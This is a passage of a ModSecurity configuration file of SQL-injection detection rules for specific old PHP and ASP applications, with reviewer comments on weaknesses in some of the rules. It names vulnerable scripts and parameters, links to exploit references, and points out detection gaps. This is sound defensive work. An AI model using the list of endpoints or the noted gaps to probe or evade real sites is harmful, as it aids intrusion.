SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_doc UPDATE SecRule REQUEST_LINE "@contains /dettaglio.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006620,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_doc UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21463'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_doc/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_doc UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006626) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_aut UPDATE SecRule REQUEST_LINE "@contains /dettaglio.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006626,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_aut UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21463'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_aut/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_aut UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005930) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php did UPDATE SecRule REQUEST_LINE "@contains /mod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005930,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php did 
UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3004'" SecRule &TX:'/SQL_INJECTION.*ARGS:did/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php did UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005936) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php cid UPDATE SecRule REQUEST_LINE "@contains /mod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005936,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php cid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3004'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007379) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS fipsGallery SQL Injection Attempt -- index1.asp which UPDATE SecRule REQUEST_LINE "@contains /index1.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007379,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS fipsGallery SQL Injection Attempt -- index1.asp which UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2829'" SecRule &TX:'/SQL_INJECTION.*ARGS:which/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS fipsGallery SQL Injection Attempt -- index1.asp which UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007385) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 
fipsForum SQL Injection Attempt -- default2.asp kat UPDATE SecRule REQUEST_LINE "@contains /default2.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007385,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS fipsForum SQL Injection Attempt -- default2.asp kat UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2830'" SecRule &TX:'/SQL_INJECTION.*ARGS:kat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS fipsForum SQL Injection Attempt -- default2.asp kat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007391) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS fipsCMS SQL Injection Attempt -- index.asp fid UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007391,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS fipsCMS SQL Injection Attempt -- index.asp fid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2828'" SecRule &TX:'/SQL_INJECTION.*ARGS:fid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS fipsCMS SQL Injection Attempt -- index.asp fid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004113) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gCards SQL Injection Attempt -- getnewsitem.php newsid UPDATE SecRule REQUEST_LINE "@contains /getnewsitem.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004113,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS gCards SQL Injection Attempt -- getnewsitem.php newsid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3988'" SecRule &TX:'/SQL_INJECTION.*ARGS:newsid/' 
"@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gCards SQL Injection Attempt -- getnewsitem.php newsid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005810) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php id UPDATE SecRule REQUEST_LINE "@contains /display_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005810,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0056'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005816) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php user_login_cookie UPDATE SecRule REQUEST_LINE "@contains /display_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005816,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php user_login_cookie UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0056'" SecRule &TX:'/SQL_INJECTION.*ARGS:user_login_cookie/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php user_login_cookie UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" 
# (2005822) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- compare_product.php id UPDATE
# Chain: REQUEST_LINE must contain "/compare_product.php" (after URL and HTML
# entity decoding and Windows path normalisation), and at least one TX variable
# whose name matches /SQL_INJECTION.*ARGS:id/ must exist. On a match the chain
# adds tx.critical_anomaly_score to tx.anomaly_score and adds audit log part E.
# Nothing in the chain tests for the UPDATE keyword named in the title, and the
# rule never inspects the parameter value itself. Presumably the TX variables
# are written by generic SQL injection rules that run earlier in phase 2;
# confirm the include order, otherwise this chain cannot fire.
# NOTE(review): the name pattern has no end anchor, so "ARGS:id" would also
# select entries recorded for parameters whose names only start with "id".
SecRule REQUEST_LINE "@contains /compare_product.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005822,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- compare_product.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3083'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- compare_product.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005828) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGeneric iG Calendar SQL Injection Attempt -- user.php id UPDATE
# Same structure as 2005822 with the path "/user.php". The path test is a plain
# substring of the request line, so any application that serves a user.php
# script with an "id" parameter can raise this alert; treat the product name in
# msg as a hint during triage, not as an identification of the target.
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005828,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS iGeneric iG Calendar SQL Injection Attempt -- user.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3082'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGeneric iG Calendar SQL Injection Attempt -- user.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2006614) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iWare Professional SQL Injection Attempt -- index.php D UPDATE
# Standalone rule, not a chain: unlike its neighbours it has no REQUEST_LINE
# path test, although the title names index.php. It fires on any request for
# which a TX variable matching /SQL_INJECTION.*ARGS:D/ exists, and because the
# pattern has no end anchor that includes any parameter whose name starts with
# an upper-case "D". Expect this alert on unrelated applications.
# NOTE(review): confirm whether the path condition was dropped on purpose
# (this rule is rev:6); if not, chain it to a REQUEST_LINE test like the rules
# around it.
SecRule &TX:'/SQL_INJECTION.*ARGS:D/' "@gt 0" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006614,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS iWare Professional SQL Injection Attempt -- index.php D UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21467',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iWare Professional SQL Injection Attempt -- index.php D UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2004845) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS mcRefer SQL Injection Attempt -- install.php bgcolor UPDATE
# Same chain structure: path substring "/install.php" plus a recorded
# SQL_INJECTION entry for a parameter matching "bgcolor".
SecRule REQUEST_LINE "@contains /install.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004845,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS mcRefer SQL Injection Attempt -- install.php bgcolor UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459796/100/200/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:bgcolor/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS mcRefer SQL Injection Attempt -- install.php bgcolor UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2004469) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UNION SELECT
# The match logic is identical to rule 2004473 (index.php cat_id UPDATE): both
# test "/index.php" and /SQL_INJECTION.*ARGS:cat_id/, and neither tests for the
# SQL keyword in its title. One request therefore raises both alerts and adds
# tx.critical_anomaly_score twice; account for that when tuning the anomaly
# threshold or reading alert counts.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004469,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24249'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2004473) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UPDATE
# Same conditions as 2004469; only the msg text differs.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004473,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24249'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2004479) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php year UPDATE
# Same chain structure: path substring "/index.php" plus a recorded
# SQL_INJECTION entry for a parameter matching "year".
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004479,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php year UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24249'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:year/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php year UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2004010) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UPDATE
# The path test includes the "/read/" directory, which narrows the match
# compared with the bare "/index.php" tests above.
SecRule REQUEST_LINE "@contains /read/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004010,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3964'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2010619) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBMS invoices_discount_ajax.php id Parameter UPDATE SET SQL Injection Attempt
# Three-link chain: path substring, then the substring "GET " in the request
# line, then the TX count. The middle link limits this rule to requests whose
# request line contains "GET "; the same parameter arriving by another method
# is not covered by this chain.
# NOTE(review): "@contains GET " is a substring test on the whole request
# line, not a method comparison; a test on REQUEST_METHOD would state the
# intent more precisely.
SecRule REQUEST_LINE "@contains /modules/bms/invoices_discount_ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010619,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS phpBMS invoices_discount_ajax.php id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBMS invoices_discount_ajax.php id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2004904) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpCC SQL Injection Attempt -- nickpage.php npid UPDATE
# Same chain structure: path substring "/nickpage.php" plus a recorded
# SQL_INJECTION entry for a parameter matching "npid".
SecRule REQUEST_LINE "@contains /nickpage.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004904,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpCC SQL Injection Attempt -- nickpage.php npid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3299'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:npid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpCC SQL Injection Attempt -- nickpage.php npid 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004175) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php image_id UPDATE SecRule REQUEST_LINE "@contains /gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004175,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php image_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:image_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php image_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php cat_id UPDATE SecRule REQUEST_LINE "@contains /gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004181,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php cat_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php cat_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004187) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_id UPDATE SecRule REQUEST_LINE "@contains /news.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004187,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:news_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004193) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- print.php news_id UPDATE SecRule REQUEST_LINE "@contains /print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004193,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- print.php news_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:news_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- print.php news_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004199) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_cat_id UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004199,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_cat_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:news_cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php 
news_cat_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004205) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php cat_id UPDATE SecRule REQUEST_LINE "@contains /forums.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004205,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php cat_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php cat_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004211) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php topic_id UPDATE SecRule REQUEST_LINE "@contains /forums.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004211,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php topic_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:topic_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php topic_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004217) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php post_id UPDATE SecRule REQUEST_LINE "@contains /forums.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004217,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php post_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:post_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php post_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004223) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- users.php user_id UPDATE SecRule REQUEST_LINE "@contains /users.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004223,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- users.php user_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- users.php user_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003787) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pnFlashGames SQL Injection Attempt -- index.php cid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003787,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS pnFlashGames SQL Injection Attempt -- index.php cid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3813'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pnFlashGames SQL Injection Attempt -- 
